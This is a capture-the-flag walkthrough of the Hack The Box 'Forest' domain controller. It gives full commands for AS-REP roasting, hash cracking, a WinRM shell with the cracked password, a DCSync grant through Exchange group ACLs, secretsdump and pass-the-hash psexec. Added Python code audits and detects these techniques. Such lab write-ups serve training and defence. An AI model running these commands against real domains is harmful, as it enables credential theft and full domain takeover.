Forest

Forest is an easy difficulty Windows Domain Controller (DC) for a domain in which Exchange Server has been installed. The DC is found to allow anonymous LDAP binds, which is used to enumerate domain objects. The password for a service account with Kerberos pre-authentication disabled can be cracked to gain a foothold. The service account is found to be a member of the Account Operators group, which can be used to add users to privileged Exchange groups. The Exchange group membership is leveraged to gain DCSync privileges on the domain and dump the NTLM hashes.

Skills Required: Enumeration

Skills Learned: ASREPRoasting, Enumeration with Bloodhound, DCSync Attack

Reconnaissance :

nmap

As usual, we start by scanning all open ports and running services with nmap.

The machine appears to be a Domain Controller for the HTB.LOCAL domain.

LDAP :

It's worth checking if the LDAP service allows anonymous binds using the ldapsearch tool.

The -x flag selects simple authentication, which with no bind DN is an anonymous bind, while the -b flag sets the base DN to search from. We were able to query the domain without credentials, which means null binds are enabled.

windapsearch

Now that we know the domain can be queried without credentials, we use a tool called windapsearch to enumerate it further. windapsearch is a Python script that enumerates users, groups and computers from a Windows domain through LDAP queries.

windapsearch github Link

Enumerating domain Users :

python3 windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U

We can also use enum4linux to enumerate the domain users and groups:

enum4linux 10.10.10.161

Enumerating Users

Enumerating Groups

Foothold

AS-REP Roasting :

If we had a user's credentials we could use Kerberoasting (covered in the Active box), but in this lab we have no credentials. AS-REP Roasting does not need any: it targets accounts that have the property “Do not require Kerberos preauthentication” (UF_DONT_REQUIRE_PREAUTH) set, because the KDC issues an AS-REP for such an account without proof of the password, and part of that reply is encrypted with the account's password-derived key, which can then be cracked offline.

After running enum4linux we have a list of users; let's filter them and put them in a file (userslist.txt).

Now let's use the Impacket script GetNPUsers.py to check which accounts have this property set and request an AS-REP hash for each of them:

for user in $(cat userslist.txt); do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done
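The defender's view of the same property, as an added example that is not part of the walkthrough: the first function audits userAccountControl values for the UF_DONT_REQUIRE_PREAUTH bit the text names (skipping disabled accounts, for which the KDC issues nothing), and the second scans Security log event 4768 for a TGT issued with no pre-authentication, which is what a roasting request leaves behind. The account list, log lines, IP addresses and the names other than svc-alfresco are constructed; the flag values are the documented userAccountControl bits.

```python
# Added example (not from the walkthrough): auditing and detecting AS-REP
# roasting exposure. All input data below is constructed inline.

UF_ACCOUNTDISABLE = 0x0002          # userAccountControl: account is disabled
UF_DONT_EXPIRE_PASSWD = 0x10000     # userAccountControl: password never expires
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Constructed sAMAccountName -> userAccountControl sample. svc-alfresco gets
# NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQUIRE_PREAUTH; other names are made up.
SAMPLE_ACCOUNTS = {
    "Administrator": 0x10200,
    "svc-alfresco": 0x410200,
    "jdoe": 0x10200,
    "svc-old": 0x400202,  # preauth disabled, but the account itself is disabled
}

# Constructed key=value renderings of Security log events. 192.0.2.10 stands in
# for an unknown client; 10.10.10.50 for an ordinary domain workstation.
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=svc-alfresco ServiceName=krbtgt PreAuthType=0 "
    "TicketEncryptionType=0x17 Status=0x0 IpAddress=192.0.2.10",
    "EventID=4768 TargetUserName=jdoe ServiceName=krbtgt PreAuthType=2 "
    "TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.50",
    "EventID=4768 TargetUserName=svc-legacy ServiceName=krbtgt PreAuthType=0 "
    "TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.50",
    "EventID=4771 TargetUserName=jdoe Status=0x18 IpAddress=10.10.10.50",
]


def roastable_accounts(accounts):
    """Enabled accounts whose userAccountControl has DONT_REQUIRE_PREAUTH set.

    Disabled accounts are left out: the KDC will not issue an AS-REP for them,
    so they are not exposed (though the flag is still worth removing).
    """
    return sorted(
        name for name, uac in accounts.items()
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE
    )


def parse_kv(line):
    """Split 'k=v k=v ...' into a dict (values carry no spaces in this rendering)."""
    return dict(field.split("=", 1) for field in line.split())


def asrep_roast_indicators(lines):
    """4768 events where a TGT was issued with PreAuthType 0 (no pre-authentication).

    Returns (user, client IP, rc4) tuples. Roasting tools ask for RC4 (0x17) so
    the hash is cheap to crack; a legitimate client for such an account would
    normally negotiate AES (0x12), so rc4=True is the strong signal.
    """
    hits = []
    for line in lines:
        ev = parse_kv(line)
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") == "0":
            hits.append((ev["TargetUserName"], ev["IpAddress"],
                         ev["TicketEncryptionType"] == "0x17"))
    return hits


if __name__ == "__main__":
    print("accounts exposed to AS-REP roasting:", roastable_accounts(SAMPLE_ACCOUNTS))
    for user, ip, rc4 in asrep_roast_indicators(SAMPLE_4768):
        print(f"4768 without preauth: user={user} from={ip} rc4={rc4}")
```

The first function is the remediation list (clear the flag, or at least rotate to a long random password); the second is what a SIEM rule for this technique reduces to, once 4768 is being collected from the DCs.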

Get Shell as svc-alfresco :

Let's crack the hash with hashcat (mode 18200 is Kerberos 5 AS-REP etype 23):

hashcat -m 18200 hashes.kerberoast /usr/share/wordlists/rockyou.txt

So the password is s3rvice, which we can use to get a WinRM shell:

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

The user flag is at

C:\Users\svc-alfresco\Desktop

Privilege Escalation

Running winPEAS did not reveal any obvious privilege escalation, so let's use BloodHound to visualise the domain and look for escalation paths.

We could transfer SharpHound to the target machine to collect the data and then bring it back to the attack machine to visualise it in BloodHound, but we can also collect it directly from the attack machine with a tool called bloodhound.py:

bloodhound.py link

python bloodhound.py -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161

Then upload this data to BloodHound, set svc-alfresco as the start node and Domain Admins as the target node.

Join Exchange Windows Permissions Group

Because svc-alfresco is in Service Account, which is a member of Privileged IT Account, which is a member of Account Operators, it’s effectively a member of Account Operators. And Account Operators has GenericAll over the Exchange Windows Permissions group.
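What BloodHound is computing here is transitive group membership plus a breadth-first search over "control" edges. The following is an added example, not BloodHound's code or anything from the walkthrough: it rebuilds the graph described above by hand (group names as in the text, plus a made-up ordinary user jdoe for contrast), resolves the effective rights of a principal, finds the shortest path to the domain object, and then checks that unnesting Privileged IT Account from Account Operators removes the path, which is the remediation an auditor would verify.

```python
from collections import deque

# Added example (not BloodHound output, not the walkthrough's code). The graph
# is constructed from the relationships the text describes.
MEMBER_OF = {
    "svc-alfresco": ["Service Account"],
    "Service Account": ["Privileged IT Account"],
    "Privileged IT Account": ["Account Operators"],
    "jdoe": ["Domain Users"],  # constructed ordinary user
}

# ACL edges as (holder, right, target). HTB.LOCAL is the domain object.
ACL_EDGES = [
    ("Account Operators", "GenericAll", "Exchange Windows Permissions"),
    ("Exchange Windows Permissions", "WriteDacl", "HTB.LOCAL"),
]

# Rights that give the holder control of the target (add members, rewrite
# its DACL, take ownership); only these are followed when building a path.
CONTROL_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner", "AddMember"}


def transitive_groups(principal, member_of=MEMBER_OF):
    """All groups the principal belongs to, following nested membership."""
    seen, queue = set(), deque(member_of.get(principal, []))
    while queue:
        group = queue.popleft()
        if group in seen:
            continue
        seen.add(group)
        queue.extend(member_of.get(group, []))
    return seen


def effective_rights(principal, member_of=MEMBER_OF, acl=ACL_EDGES):
    """Rights held directly or through any nested group, as (right, target)."""
    holders = {principal} | transitive_groups(principal, member_of)
    return sorted((right, target) for holder, right, target in acl if holder in holders)


def shortest_path(start, goal, member_of=MEMBER_OF, acl=ACL_EDGES):
    """BFS over MemberOf and control-right edges; returns [(from, edge, to), ...]
    or None when no path exists (the same question BloodHound's query answers)."""
    def neighbours(node):
        for group in member_of.get(node, []):
            yield "MemberOf", group
        for holder, right, target in acl:
            if holder == node and right in CONTROL_RIGHTS:
                yield right, target

    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for label, nxt in neighbours(node):
            if nxt not in prev:
                prev[nxt] = (node, label)
                queue.append(nxt)
    if goal not in prev:
        return None
    path, node = [], goal
    while prev[node] is not None:
        parent, label = prev[node]
        path.append((parent, label, node))
        node = parent
    return path[::-1]


if __name__ == "__main__":
    for hop in shortest_path("svc-alfresco", "HTB.LOCAL"):
        print(" -> ".join(hop))
    # Remediation check: remove the nesting into Account Operators and re-run.
    fixed = {**MEMBER_OF, "Privileged IT Account": []}
    print("path after unnesting:", shortest_path("svc-alfresco", "HTB.LOCAL", fixed))
```

Running it prints the five-hop chain the text describes and then None for the fixed graph, which is the evidence to attach to a finding: the path exists only because a low-privilege service group is nested, three levels deep, inside a built-in privileged group.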

Right-clicking the GenericAll edge and choosing Help gives full background on this relationship; scrolling down in the Abuse Info tab you will find some examples:

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members 'svc-alfresco' -Credential $Cred
net group "Exchange Windows Permissions" svc-alfresco /add /domain

Since we are a member of Account Operators, we have the right to create new users and add them to groups. Let's create a new user and add it to Exchange Windows Permissions.

Grant DCSync Privileges :

Now I’ll use the fact that members of the Exchange Windows Permissions group have WriteDacl on the domain object.

Again, right-clicking the WriteDacl edge and opening Help, the Abuse Info tab shows how this right is abused.

First I imported the PowerView.ps1 module, then used it to assign the DCSync privilege to the newly created user ismail:

$SecPassword = ConvertTo-SecureString 'Lionel129!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\ismail', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=htb,DC=local' -Rights DCSync -PrincipalIdentity ismail -Domain htb.local

Then, on my machine, I used Impacket’s secretsdump script with the newly created user to dump the hashes from the domain, and passed the Administrator hash to psexec:

impacket-secretsdump htb.local/ismail@10.10.10.161
impacket-psexec htb.local/administrator@10.10.10.161 -hashes <hash>
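Both steps above leave traces a defender can key on: the Add-DomainObjectAcl grant is a write to the domain object's nTSecurityDescriptor (event 5136 when Directory Service Changes auditing is on), and the secretsdump run is a replication request, which shows up as event 4662 with the replication control-access rights exercised by something that is not a domain controller. The following is an added example, not from the walkthrough: it matches 4662 events against the well-known replication rights GUIDs and alerts on any principal that is neither a DC computer account nor on an allowlist (for example, the AD Connect sync account in a real environment). The event lines are constructed, flattened renderings; a real 4662 carries the GUIDs in a multi-line Properties field. FOREST$ and ismail come from the walkthrough, jdoe and the last GUID are made up.

```python
import re

# Added example (not from the walkthrough): DCSync detection over 4662 events.
# These three GUIDs are the documented control-access rights that directory
# replication requires; holding the first two is what DCSync depends on.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed key=value renderings of Security log events.
SAMPLE_EVENTS = [
    # The DC replicating with itself or a peer: expected, not an alert.
    "EventID=4662 SubjectUserName=FOREST$ SubjectDomainName=HTB ObjectType=domainDNS "
    "AccessMask=0x100 Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    # A user account exercising replication rights: the secretsdump run.
    "EventID=4662 SubjectUserName=ismail SubjectDomainName=HTB ObjectType=domainDNS "
    "AccessMask=0x100 Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    # Unrelated object access with a made-up property GUID: ignored.
    "EventID=4662 SubjectUserName=jdoe SubjectDomainName=HTB ObjectType=user "
    "AccessMask=0x10 Properties=deadbeef-0000-4000-8000-000000000001",
    "EventID=4624 SubjectUserName=jdoe LogonType=3",
]


def parse_kv(line):
    """Split 'k=v k=v ...' into a dict (values carry no spaces in this rendering)."""
    return dict(field.split("=", 1) for field in line.split())


def dcsync_alerts(lines, domain_controllers, allowlist=frozenset()):
    """(account, [right names]) for every 4662 in which a principal that is not a
    DC computer account and not allowlisted exercised a replication right."""
    alerts = []
    for line in lines:
        ev = parse_kv(line)
        if ev.get("EventID") != "4662":
            continue
        who = ev.get("SubjectUserName", "")
        if who in domain_controllers or who in allowlist:
            continue
        guids = [g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))]
        rights = [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]
        if rights:
            alerts.append((who, rights))
    return alerts


if __name__ == "__main__":
    for account, rights in dcsync_alerts(SAMPLE_EVENTS, {"FOREST$"}):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

The DC allowlist should be derived from the domain's domain-controller OU rather than typed by hand, and the alert is only as good as the audit policy: 4662 needs Directory Service Access auditing enabled on the DCs, and the default SACL on the domain object already covers these control-access rights.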

The root flag is at

C:\Users\Administrator\Desktop

Hope you found this walkthrough easy to understand and follow.

Greeting From Sayonara
